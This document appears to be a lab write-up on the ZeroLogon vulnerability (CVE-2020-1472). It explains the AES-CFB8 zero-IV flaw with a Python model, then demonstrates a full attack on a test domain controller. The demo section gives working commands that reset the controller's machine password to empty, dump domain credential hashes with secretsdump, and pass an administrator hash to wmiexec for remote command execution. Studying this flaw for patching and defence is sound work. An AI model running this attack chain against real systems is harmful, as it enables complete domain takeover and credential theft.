# ZeroLogon Exploit

## Introduction

[CVE-2020-1472](https://nvd.nist.gov/vuln/detail/CVE-2020-1472) is a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) that Microsoft fixed with a [patch](https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Aug) ([KB4565349](https://support.microsoft.com/en-us/help/4565349/windows-10-update-kb4565349)) released in August 2020.\
\
This vulnerability was discovered by Secura security researcher [Tom Tervoort](https://www.secura.com/blog/zero-logon) on 11 September 2020. The weakness lies in the encryption mode, Advanced Encryption Standard in 8-bit Cipher Feedback mode (AES-CFB8), that MS-NRPC uses to encrypt the "Client Challenge" into the client credential during the third step of the MS-NRPC handshake.\
\
ZeroLogon affected all Windows servers that function as Active Directory domain controllers in enterprise networks.

The following diagram shows the MS-NRPC authentication handshake; the attack targets step 3, where the client credential is computed by encrypting the client challenge with AES-CFB8.

The way MS-NRPC uses AES-CFB8 has a problem with the Initialisation Vector (IV). The IV should be random, but MS-NRPC uses a fixed IV of 16 zero bytes. As a result, if the client challenge is set to all zeros, the encryption result is all zeros with probability 1/256 (whenever the first keystream byte is zero, the shift register stays all-zero and every following output byte is zero as well), so the step 4 validation can easily be passed.\
\
Full attack details are in the [whitepaper](https://www.secura.com/pathtoimg.php?id=2055) by Tom Tervoort.

![](/files/-MJ0Ej0g0sIm3qMVUult)
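As an added illustration of the flaw described above (this code is not from the original page or from any of the cited PoC tools): a generic CFB8 routine modelling the AES flavour of ComputeNetlogonCredential, run over many constructed random session keys to show that an all-zero challenge produces an all-zero credential for about 1 key in 256. It assumes AES-128 via the `cryptography` package and otherwise falls back to a constructed SHA-256 stand-in block function, since the argument depends only on the fixed zero IV and the zero plaintext, not on the cipher itself.

```python
"""CFB8 with the fixed zero IV of MS-NRPC: zero challenge -> zero credential for ~1/256 keys."""
import hashlib
import random

BLOCK = 16
ZERO_IV = bytes(BLOCK)  # MS-NRPC fixes the IV to 16 zero bytes

try:  # real AES-128 when the `cryptography` package is installed (assumed)
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        enc = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend()).encryptor()
        return enc.update(block) + enc.finalize()
except ImportError:  # constructed stand-in block function, NOT AES
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        return hashlib.sha256(key + block).digest()[:BLOCK]

def cfb8_encrypt(key: bytes, plaintext: bytes, iv: bytes = ZERO_IV) -> bytes:
    """Generic CFB8: C[i] = P[i] XOR first byte of E(key, register); the
    register then drops its oldest byte and shifts C[i] in on the right."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, bytes(register))[0]
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)

def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """Models the AES flavour of ComputeNetlogonCredential (handshake step 3):
    CFB8 over the 8-byte challenge with the fixed zero IV."""
    return cfb8_encrypt(session_key, challenge, ZERO_IV)

def zero_credential_predicted(session_key: bytes) -> bool:
    """Zero IV + zero plaintext: if the first keystream byte is 0x00 then C[0] is
    0x00, the register stays all-zero and every later byte repeats the result, so
    the credential is all zeros exactly when E(key, 0^16)[0] == 0 (1/256 of keys)."""
    return block_encrypt(session_key, ZERO_IV)[0] == 0

def zero_credential_fraction(n_keys: int, seed: int = 1) -> float:
    """Fraction of constructed (seeded) random keys giving an all-zero credential."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(n_keys):
        key = bytes(rng.getrandbits(8) for _ in range(BLOCK))
        cred = compute_netlogon_credential(key, bytes(8))
        assert (cred == bytes(8)) == zero_credential_predicted(key)
        hits += cred == bytes(8)
    return hits / n_keys
```

Running `zero_credential_fraction(4096)` lands near 0.0039, matching the 1/256 figure in the text regardless of which block function is in use.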

## Exploitation Demo

Many PoC exploits have been released ([1](https://github.com/dirkjanm/CVE-2020-1472), [2](https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472), [3](https://github.com/risksense/zerologon), [4](https://github.com/bb00/zer0dump), [5](https://github.com/gentilkiwi/mimikatz/releases), etc.).

### Target Environment

```
Host Name:      FKCLAI-WIN2016
OS Name:        Microsoft Windows Server 2016 Standard
OS Version:     10.0.14393 N/A Build 14393
Domain:         FKCLAI.local
Logon Server:   \\FKCLAI-WIN2016
```

![](/files/-MJ2YecxGhCX4VOe_Q1z)

### Tools Setup

This demo uses [RiskSense](https://github.com/risksense/zerologon)'s ZeroLogon exploitation script together with the latest [impacket](https://github.com/SecureAuthCorp/impacket/commit/b867b21) from source.

```
root@kclai:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
Cloning into 'zerologon'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
Unpacking objects: 100% (22/22), done.
root@kclai:~/Documents/ctf/expoit# 
```

Remove the distribution-packaged impacket scripts so they do not conflict with the source build:

```
root@kclai:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmap
  erlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inets
  erlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-tools
  erlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtool
  erlang17-xmerl fimap findmyhash funkload gconf-service gconf2-common
  ghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2
  gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabber
  guile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-common
  keimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0
  libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0
  libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0
  libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
  libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0

```

Get the latest impacket from <https://github.com/SecureAuthCorp/impacket.git> and install it:

```
root@kclai:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18598, done.
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
Resolving deltas: 100% (14169/14169), done.

```

```
root@kclai:~/Documents/ctf/tools/win/impacket# python setup.py install
running install
running bdist_egg
running egg_info
creating impacket.egg-info
writing requirements to impacket.egg-info/requires.txt
writing impacket.egg-info/PKG-INFO
writing top-level names to impacket.egg-info/top_level.txt
writing dependency_links to impacket.egg-info/dependency_links.txt
writing manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no files found matching 'tests' under directory 'examples'
warning: no files found matching '*.txt' under directory 'examples'
writing manife
..
..
..
... dding ldapdomaindump 0.9.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for ldap3==2.5.1
Best match: ldap3 2.5.1
Adding ldap3 2.5.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for Flask==1.1.1
Best match: Flask 1.1.1
Adding Flask 1.1.1 to easy-install.pth file
Installing flask script to /usr/local/bin

Using /usr/lib/python3/dist-packages
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
root@kclai:~/Documents/ctf/tools/win/impacket# 

```

### Start Exploit

```
python3 set_empty_pw.py fkclai-win2016 192.168.1.169
```

![](/files/-MJ2c3XobbUvIlrUt-1m)

```
secretsdump.py -just-dc administrator/fkclai-win2016\$@192.168.1.169
```

![](/files/-MJ2i54E3CALPmCcmAmQ)

```
wmiexec.py fkclai/administrator@192.168.1.169 -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
```

![](/files/-MJ2kQOZho_FBY6q63vH)

## mimikatz [Source Code](https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_lsadump.c)

